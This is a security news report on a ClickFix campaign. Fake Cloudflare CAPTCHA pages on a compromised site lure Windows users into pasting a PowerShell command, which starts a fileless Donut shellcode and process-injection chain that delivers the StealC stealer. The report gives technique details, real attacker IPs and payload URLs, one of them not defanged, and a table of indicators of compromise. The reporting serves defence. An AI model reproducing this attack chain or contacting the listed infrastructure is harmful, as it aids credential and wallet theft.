A new wave of ClickFix attacks is targeting Windows users with fake Cloudflare-style CAPTCHA verification pages that trick victims into executing malicious PowerShell commands.
This campaign delivers a multi-stage, fileless infection chain that ends with StealC, a powerful information stealer capable of harvesting credentials, cryptocurrency wallets, gaming accounts, emails, and detailed system fingerprints.
The operation relies on social engineering rather than software exploits, making it especially dangerous for organizations that rely solely on technical controls.
The campaign begins when users browse to a compromised website, where injected JavaScript silently loads a fake Cloudflare verification page that resembles a standard CAPTCHA or Turnstile check.
The victim visited madamelam.com, a Vietnamese restaurant’s website that had been compromised by threat actors.
When the user clicks “verify,” the page surreptitiously copies a prebuilt PowerShell command to the clipboard, instructing them to press Windows Key + R, paste with Ctrl + V, and press Enter, presenting this as a required security step.
ClickFix Attack Wave
The PowerShell command then runs in-memory, using Invoke-WebRequest-style functionality to pull a loader script from attacker-controlled infrastructure without writing a traditional executable to disk.
Once executed, the Stage 1 PowerShell loader connects to a remote IP such as 91.92.240.219 to download and run shellcode directly in memory.
This script allocates executable memory, copies the shellcode into the allocated region, and starts a new thread to execute it, relying on dynamic API resolution via .NET reflection to call low-level Windows APIs from PowerShell.
The loader employs fileless execution, direct memory manipulation, and thread-based execution to bypass many endpoint security controls that focus on disk artifacts or traditional process trees.
The downloaded shellcode, identified as cptch.bin, is a 32‑bit position‑independent payload generated with the Donut framework, which is designed to convert PE files into shellcode for in‑memory execution.
%20with%20embedded%20payload.jpg?width=540&height=361&name=Figure%207.%20Detect%20It%20Easy%20analysis%20revealing%20cptch.bin%20as%20position-independent%20shellcode%20(Donut%20loader)%20with%20embedded%20payload.jpg)
Donut embeds a full Windows executable inside the shellcode, enabling reflective PE loading so the malware can parse PE headers, allocate memory for the full image, apply relocations, resolve imports, and then transfer control to the embedded PE’s entry point all without using the normal Windows loader.
The campaign is notable for combining ClickFix social engineering, fileless PowerShell loaders, Donut-based shellcode, reflective PE loading, and process injection into a single chain.
This technique allows the actors to load a 64‑bit downloader component completely in memory, further reducing forensic traces and avoiding conventional signature-based detection.
StealC Stealer Malware
The reflectively loaded Stage 3 component is a 64‑bit downloader and injector whose purpose is to retrieve the final StealC payload and inject it into a legitimate Windows process such as svchost.exe.
It connects to a URL like http://94.154.35.115/user_profiles_photo/cptchbuild.bin using a custom User‑Agent set to “Loader,” downloads the StealC binary, and allocates memory inside the target process to write and execute the code via a remote thread.
By terminating itself after injection, the downloader minimizes evidence on disk and leaves StealC running under the identity of a trusted system process.
StealC itself is a 64‑bit information stealer, compiled with Microsoft Visual C++, and distributed through a builder-based malware-as-a-service ecosystem.
It uses Base64 plus RC4 encryption to obfuscate embedded strings, with a hardcoded key for static data and a separate build ID used as the RC4 key for C2 traffic over HTTP.
Once active, StealC targets Chromium and Firefox-based browsers, numerous cryptocurrency wallet extensions and desktop wallets, Steam configuration files, Outlook profiles, system fingerprints, screenshots, and arbitrary documents and database files, staging all stolen data in structured directories before exfiltration to a C2 endpoint such as 91.92.240.190.
With no persistence and optional self-deletion after data theft, StealC leaves a narrow response window, underscoring the need for user awareness around fake verification prompts, strict PowerShell logging, and behavioral monitoring of clipboard abuse, network connections, and unusual PowerShell-to-svchost process relationships.
Indicators of Compromise (IOCs)
| Category | Indicator | Description |
|---|---|---|
| IP Address | 94.154.35.115 | Stage 2 payload delivery |
| IP Address | 91.92.240.219 | PowerShell loader |
| IP Address | 178.16.53.70 | PowerShell loader |
| IP Address | 91.92.240.190 | StealC C2 server |
| URL | hxxp[:]//94.154.35.115/user_profiles_photo/cptch.bin | Stage 2 payload file |
| URL | hxxp[:]//94.154.35.115/user_profiles_photo/cptchbuild.bin | Additional payload file |
| URL | hxxp[:]//91.92.240.219/ | PowerShell loader host |
| URL | hxxp[:]//91.92.240.190/fbfde0da45a9450b.php | StealC command-and-control endpoint |
| URL | hxxps[:]//goveanrs.org/jsrepo | Suspicious JavaScript-hosting domain |
| URL | hxxps[:]//madamelam.com | Potential malicious redirect or payload domain |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
